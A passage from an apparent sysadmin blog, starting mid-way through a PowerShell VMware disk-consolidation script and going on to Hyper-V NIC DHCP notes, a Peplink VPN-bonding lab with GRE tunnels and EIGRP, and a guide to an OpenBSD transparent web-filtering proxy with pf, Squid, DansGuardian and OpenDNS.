	$vms = Get-VM | Where-Object {$_.Extensiondata.Runtime.ConsolidationNeeded}
	if ($vms -ne $null){
		write-host "Consolidating any triggered VMs" -foregroundcolor "green" -backgroundcolor "black"
		foreach ($vm in $vms){
			(Get-VM -Name $vm.Name).ExtensionData.ConsolidateVMDisks_Task()
			write-host "Task sent for consolidation of the following VM: $($vm.Name) sent to vCenter"
		}
	}
	disconnect-viserver $viserver -confirm:$false | out-null 
	;""
	;""
}
;""
$sw.stop()
write-host "All of your sweet checks took this much time to run:" -foregroundcolor "green" -backgroundcolor "black"
$sw.Elapsed
}

So to resolve this issue I forced DHCP to be disabled, and also did not assign a static IP causing the interface to default to the 169.xx.xx.xx address that windows does when it cannot pull a DHCP address.

Doing this from my work computer so don’t have the Hyper-V NIC names atm, will update later. (For now below example will disable DHCP on Ethernet “ifIndex 2” interface.)

 PS C:\WINDOWS\system32> Get-NetAdapter
 
 Name                      InterfaceDescription                    ifIndex Status    

 Wi-Fi                     Intel(R) Centrino(R) Advanced-N 6205         11 Disconnected

 Ethernet                  Intel(R) Ethernet Connection I217-LM          2 Up          

PS C:\WINDOWS\system32> Set-NetIpInterface -ifindex 2 -Dhcp Disabled
PS C:\WINDOWS\system32>

The NIC will drop the IP from the VM on that vSwitch, and assign a default 169.xx.xx.xx address after doing this.
Cheers!

VPN Bonding
Hey everyone! Wylie is back in action and this topic is all about VPN bonding and the challenges you can face when coming up with a solution that is right for your organization.

I know many organizations are still utilizing private leased lines from phone companies such as Century Link. These private lines can cost a place a fortune, especially with multiple locations involved. Not to mention they are slow and even with a service agreement.. can fall short on reliability… So what is a place to do? Well the first major thing to be concerned about when thinking of a VPN bonding solution is location. Where your organization has locations and what consumer broadband services are available in those area’s. More than likely if you can get a private MPLS line to a location, you probably have some type of broadband options. Multiple broadband options from different service providers is desired for best results.

The Equipment:

1. Cisco routers 1900 series routers.
2. Peplink Balance 580 and 380 VPN bonding appliances.
3. Fortigate / PFSense(custom) firewalls.
4. Some Gigabit ethernet switches. (This can vary depending what you have available)
5. Ubuntu 11.1 box and a Windows XP laptop.

The Testing:
The lab we setup simulated VPN bonding at 3 locations. We had our Peplink balance 580 at the Main location, and two balance 380?s at the remote locations. Each location had a Cisco 1921 router on the LAN interface of its respective peplink. Also we placed a Firewall in front of the WAN connections at each Peplink in a transparent filtering mode.

We then setup another Cisco 1921 to simulate the Internet. We separated each peplink into it’s own public network. 1.1.1.0/24, 2.2.2.0/24, 3.3.3.0/24. Internet router IP’s were .1 on each subnet, and each peplink device was .5 on each subnet. Once all the configurations were in place, and routing was possible, the peplink units would successfully sync up and begin their Voodoo magic bonding arrangement. Of course the peplink units had to be configured correctly with the configuration mentioned above.

The challenge:
So things at my organization are fairly simple in terms of routing. We utilize EIGRP as our IGP. Then we have BGP configured with our lease provider. The lease lines basically just create a huge bridge between all our locations and routing occurs naturally with EIGRP.. nothing stands in the way. With a VPN bonding solution, and consumer broadband, this does not occur naturally.
We investigated and researched different products to see what solutions were out there to include a Dynamic routing solution from one of these VPN bonding appliance vendors. The options were very slim. We found a few places such as Xroadsnetworks, and Riverbed that had options built in for RIPv2 and OSPF.
We also investigated creating a Layer2 bridge with the bonding appliances and creating a big local network between all the locations. This solution is possible however it is impossible to control the broadcast traffic on the network. You can stop it once it reaches the LAN side of a peplink and the Cisco router cuts off the broadcast domain and begins routing again… but that still brings the traffic all the way accross your bonded connection eating up precious bandwidth for no reason, just to get dropped by a router at the LAN side… not a very good solution.

Before we decided to order other appliances such as Xroads, or Riverbed, it occurred to us that we could more than likely establish a GRE tunnel from one LAN side Cisco router to another with tunnel interfaces. This proved true. EIGRP could easily be configured now to advertise it’s tunnel interface IP for routing. Not only for routing updates, but for ALL traffic from site to site. Everything is pushed through the tunnel interface by default at each location. This is also a amazing solutions because it completely hides how the traffic gets from one location to another. A traceroute will only show 2 hops, vs 50 across the internet.

Now that we have a way to make Cisco’s talk through this VPN Bonded Voodoo magic tunnel, the problem of dynamically updating your own routers is solved, and traffic from location to location is even more protected. You could even take it a step further and utilize an IPSec tunnel from Cisco to Cisco vice a GRE tunnel. This would be an encrypted tunnel inside of Peplink’s encrypted/bonded tunnel. We don’t really see the need for double encryption at this time as it adds more overhead, but I suppose if you have the bandwidth it wouldn’t be an issue in most cases.

Once we figured out the tunnel situation we realized it didn’t matter what VPN Bonding appliance we used, we would get our Cisco’s to talk the same way. Peplink is one of the lower end vendors in terms of pricing.. But our testing proved that the Bonding is actually very good. We could get some very HIGH speeds in our lab environment. Also the resilience of recovering connections between peplinks was very solid. Recovery times when a link went down to re-establish were excellent. These are really the only key features we needed for the actual bonding appliance.

Finally, we had to ensure we could protect the WAN side interfaces as to prevent some type of intrusion into one of the Peplink devices. We successfully configured a Fortigate 60c as well as a DL380 g3 server with PFsense in a transparent bridge mode to filter traffic from ISP’s going into the WAN interfaces on the peplinks. Filter rules were created to only allow traffic from peplink IP addresses to ensure their tunnels could establish, but all other traffic is deny’d. Rules for internal network traffic are unnecessary because all traffic is hidden inside the GRE tunnel. The WAN side firewalls cannot inspect it’s contents. However, anything coming from the internet inbound is sure to be denied.

In this particular arrangement all traffic from remote locations must travel through a Tunnel interface back to the Main location in order to get anywhere, IE: the actual internet. This protects the remote locations and ensures they are private, just as in the current Lease Line scenario.

If you have two broadband connections each with 25mbit…. the peplink units will combine those two connections and will result in 50mbit connection speed. The appliances devide packets between connections and re-assemble them at the distant end. So with three 25mbit connections your maximum throughput would be 75mbit. This bonding works with traffic going through a GRE/IPSec tunnel thus creating a MASSIVE amount of bandwidth from location to location for a Fraction of the cost of MPLS leased lines. Not only the cost… but the speed of broadband connections is far better than private lines in terms of the cost comparison.

The solution works. You can completely DO-AWAY with private lines and create the same scenario with consumer broadband. Increasing your speeds, and cutting costs. It is a wonderful amazing solution for any organization. If you have any questions or would like to know anything more specific about our testing please comment! Thanks everyone!
-Wylie

By: Wylie Bayes & Brandon Folchi

The purpose of this article is to guide anyone who is interested in setting up their own transparent proxy capable of filtering outbound web-browsing of all devices on a network. While researching options to accomplish this we came across a program called DansGuardian. DansGuardian is an open source web content filter that runs on multiple ‘Unix like’ platforms. The concept behind this application is to truly filter the content the user is browsing instead of simply having a blacklist of websites you want to avoid. It is impossible to keep up with all of the new websites that are created each day plus we are probably going to be more strict on the content that we want available than most people.

We have never accomplished any kind of network wide transparent filtering before. When we brought this topic up in a discussion a friend brought to our attention the use of OpenDNS as a simple quick and dirty “catch-all” filtering method. We decided that a Squid/Dansguardian proxy was the best option for filtering, in conjunction with the OpenDNS “catch-all” in place as a backup.

Hardware
Necessary hardware:

1. One 32 or 64bit system.
2. Two supported NICs.
3. At least one Internet connection.
4. A switch or hub, preferably 100mbit or higher.
5. See http://www.openbsd.org/plat.html to ensure your hardware is supported.

The Setup
Installing OpenBSD
Boot off your required type of OpenBSD installation media (IE: cd, usb, etc.) It is suggested to manually partitioning your disk with simply everything allocated on /. Or separate /, /home, and /var. Both /, and /var need ample space.

Configuring DHCP
Modify your /etc/dhcpd.conf to something similar. (These DNS options should work for everyone in US.) This issues IP’s between .160 – and .250.

 option domain-name “example.com”;
 option  domain-name-servers 8.8.8.8, 8.8.4.4, 208.67.222.222, 208.67.220.220;

 subnet 172.16.10.0 netmask 255.255.255.0 {
         option routers 172.16.10.1;
         range 172.16.10.160 172.16.10.250;
 }

Configuring pf.conf
The following example shows the pf.conf options necessary to accommodate this setup. All options are commented to facilitate their purpose:

 ########### Macros ######################
 extnet="dc0"
 intnet="rl0"
 #Backup wifi router
 rum0="rum0"
 ########## Options #######################
 set block-policy return
 set loginterface $extnet
 set skip on lo
 set skip on {pfsync}
 set ruleset-optimization basic
 set optimization aggressive
 set limit {states 100000 table-entries 8000000}
 set reassemble yes no-df                        # NEW
 
 ### Divert rules!!! ####
 #FTP
 pass in quick on $extnet inet proto tcp to any port ftp divert-to 127.0.0.1 port 8021
 #Dansguardian, the following divert-to rule accomplishes the “transparent” proxy.
 pass in quick on $intnet inet proto tcp to port 80 divert-to 172.16.10.1 port 8081
 #Squid (bypasses dansguardian filtering, special purpose use)
 #pass in quick on $intnet inet proto tcp to port 80 divert-to 172.16.10.1 port 8080
 
 ############ NAT RULES ##############
 match in all scrub (no-df)

 #### LAN allowed out Cable conn. 172.16.10.0/24 network out
 match out on $extnet from $intnet:network nat-to ($extnet)
 
 ############# FILTER RULES ###############
 block in log (all, to pflog0)
 ######### Default pass traffic #######
 pass out keep state
 pass in quick on $intnet
 ##(Pass traffic to and from another network, in this case a Wifi network with a seperate internet conn.)
 pass in quick on $rum0:network to $intnet:network
 pass out quick on $rum0:network to $intnet:network
 #### Anchor / Antispoof
 anchor "ftp-proxy/*"
 anchor "http-proxy/*"
 antispoof quick for { lo $intnet }
 antispoof for $extnet inet
 
 #### All outbound internet traffic ####
 pass out on $extnet proto { tcp udp icmp } all modulate state
 
 #### Inbound from the internet allows ####
 pass in log (all, to pflog0) on $extnet inet proto tcp from any to ($extnet) 
    port 22 flags S/SA keep state

 ############# Redirection Rules ################
 # SSH inbound from the internet example.
 pass in log on $extnet inet proto tcp from any to any port = 22 flags S/SA rdr-to 172.16.10.21
 ##END

OpenDNS Setup
If you have not heard about OpenDNS we recommend you take a look. The point is if you have a router where you can tell it to point to different DNS servers than what your ISP uses, then you can already start filtering the web for your network. You can use OpenDNS as a sort of “safety net” for anything inappropriate that DansGuardian might miss. If you don’t already have an OpenDNS account then go to www.opendns.com and sign up.

If you decide to use OpenDNS and don’t have a static IP address then you will need to download the client that they have. This client will update OpenDNS with your network’s public IP. This is important because if you want your filtering options to work for the computers on your network then it needs to know what network it is filtering.

The client can be found here: http://www.opendns.com/support/dynamic_ip_downloads/
You are only required to install it on a single PC that is running one of the applicable operating systems they have made a client install for.

You will need to point your Router to use following IP addresses as your DNS servers (if your OpenBSD DHCP config is Force feeding these settings you probably do not need to worry about re-configuring your ISPs device.:
• 208.67.222.222
• 208.67.220.220

For OpenBSD using a full Static IP network, you will edit the file /etc/resolv.conf to include the IP addresses of your desired DNS servers.

 bash-4.2# vi /etc/resolv.conf
 search wmfb.co
 nameserver 208.67.222.222
 nameserver 208.67.220.220
 lookup file bind

Modify your /etc/dhclient.conf :
If you are pulling DHCP from your ISP on OpenBSD, resolv.conf will be overwritten each time a lease is renewed. To ensure you keep certain options, like DNS, you must modify your /etc/dhclient.conf file to something similar:

 initial-interval 1;
 send host-name "portal";
 supersede host-name "portal";
 supersede domain-name-servers 208.67.222.222, 208.67.220.220;
 supersede domain-name "wmfb.co";
 request subnet-mask, broadcast-address, routers;

Installing Squid Proxy

 bash-4.2# export PKG_PATH=http://ftp.OpenBSD.org/pub/OpenBSD/`uname -r`/packages/`uname -m`/
 bash-4.2# pkg_add -i squid
 Ambiguous: choose package for squid
 a  0: <None>
   1: squid-2.7.STABLEp19
   2:  squid-2.7.STABLEp19-ldap
   3:  squid-2.7.STABLEp19-ldap-snmp
   4:  squid-2.7.STABLEp19-ntlm
   5:  squid-2.7.STABLEp19-snmp

Squid Configuration
Full copy of Squid.conf can be found separately here:

Installing DansGuardian
bash-4.2# export PKG_PATH=http://ftp.OpenBSD.org/pub/OpenBSD/uname -r/packages/uname -m/
bash-4.2# pkg_add -i dansguardian
dansguardian-2.10.1.1:libexecinfo-0.2p0v0: ok
dansguardian-2.10.1.1: ok

DansGuardian Configuration
Not a whole lot of changes are needed in the dansguardian.conf file to get you up and running. The configuration file should be located in the /etc/dansguardian directory. The only area you should need to edit is the “Network Settings” section of the configuration file. See below the example below:

 # Network Settings
 #
 # the IP that DansGuardian listens on.  If left blank DansGuardian will
 # listen on all IPs.  That would include all NICs, loopback, modem, etc.
 # Normally you would have your firewall protecting this, but if you want
 # you can limit it to a certain IP. To bind to multiple interfaces,
 # specify each IP on an individual filterip line.
 filterip = 172.16.10.1
 # the port that DansGuardian listens to.
 filterport = 8081
 # the ip of the proxy (default is the loopback - i.e. this server)
 proxyip = 172.16.10.1
 # the port DansGuardian connects to proxy on
 proxyport = 8080

Once complete you should be filtering your internet through Dansguardian. If Dansguardian isn’t started or for some reason is stopped you can type the following command:

 bash-4.2# /usr/local/share/dansguardian/scripts/bsd-init start

When you verify your internet traffic is being filtered by Dansguardian, you may want to do a few more configuration changes. We felt that some default lists needed to have a few modifications. There were websites and content Dansguardian was blocking that were what we considered appropriate. You can find these lists in /etc/dansguardian/lists.

Some examples include:
Exceptionsitelist
• In this list you can add (at the bottom of the file) websites you know that you can trust and want to be able to navigate around in. For example, Netflix was blocked for us by default. We appended the file with “Netflix.com”. You do not need to include http or www when adding sites, it just requires the domain.

Bannedextensionlist
• If you are like most, you probably still want to be able to download files that Dansguardian will block by default. You can comment out extensions such as exe, msi, msp, doc, xls, gz, tar, zip, bz2 etc… These will have to be a judgment call. You can’t protect yourself from everything so might as well make it easy for yourself to still access files from sources you have decided are safe.

Bannedmimetypelist
• Another file where some items were disabled. There are many things in this file you need to comment out if you want to use the technologies some websites utilize for video and other media. Again, this is a judgment call and you will have to decide what is worth the risk and works best for you.
Weightedphraselist

• This list contains the various weighted phrases and assigns a sort of “point” system to the words.
You may want to change your “naughtiness” limit if you find Dansguardian to be too strict. The default level is set to “50” which is said to be for “young children”. This setting is found in a file called dansguardianf1.conf located in /etc/dansguardian.
Below is an example of the “naughtiness limit” section of the file.

 # Naughtyness limit
 # This the limit over which the page will be blocked.  Each weighted phrase is given
 # a value either positive or negative and the values added up.  Phrases to do with
 # good subjects will have negative values, and bad subjects will have positive
 # values.  See the weightedphraselist file for examples.
 # As a guide:
 # 50 is for young children,  100 for old children,  160 for young adults.
 naughtynesslimit = 100

For the most part we found that these were the primary lists we needed to edit in order to still have the functionality we prefer while still filtering out some of the inappropriate content on the web. You may want to research and look at the other lists and change the options that were selected to suite your needs.

As a side note, DansGuardian has the capability to do some URL re-writing. This is useful if you want to control content found in Google picture searches or YouTube. For example, you can URL re-write to force “safe search” for Google Images. You can also sign up for a YouTube for Schools account and apply a URL re-write to include your “edu-filter”. This may be something we cover in another post for those who are interested.

There you have it. Centralized, un-bypassable, web-browsing control.